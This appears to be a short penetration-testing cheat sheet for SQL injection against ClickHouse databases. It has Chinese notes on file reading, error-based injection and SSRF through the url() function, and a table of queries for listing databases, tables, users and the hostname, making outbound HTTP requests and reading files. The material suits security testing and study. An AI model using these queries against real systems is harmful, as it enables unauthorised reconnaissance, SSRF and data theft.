文档: https://clickhouse.tech/docs/zh/

file 函数可以读取文件, 但不能穿越到父目录

报错注入, url 函数找不到 host, 抛出异常


SSRF, 结果中可能包含 SSRF 的响应内容(小写)



VersionSELECT version()
Current DBSELECT currentDatabase()
List DBSHOW databases OR SELECT * FROM system.databases
List columnsSELECT * FROM system.columns
List tablesSELECT * FROM system.tables
HostnameSELECT hostName()
CommentSELECT 1 comment OR SELECT 1—comment
Dummy table (dual)SELECT * FROM system.one
Current UserSELECT ‘current_user’,user FROM system.processes WHERE query LIKE ‘%current_user%’
Current os_userSELECT os_user FROM system.processes
HTTP requestSELECT * FROM url(‘http://server’, ‘CSV’, col String)
Read fileSELECT * FROM file(‘nameFile’, ‘CSV’, col String)
UnhexSELECT unhex(‘746f62695f70697a6461’)
Create an array of argument valuesSELECT groupArray(x)
Concat array of stringsSELECT arrayStringConcat(arr[, separator])
Connect to MySQLmysql(‘host:port’, ‘database’, ‘table’, ‘user’, ‘password’[, replace_query, ‘on_duplicate_clause’]);
JDBC connectionSELECT * FROM jdbc(‘jdbc:mysql://localhost:3306/?user=root&password=root’, ‘schema’, ‘table’)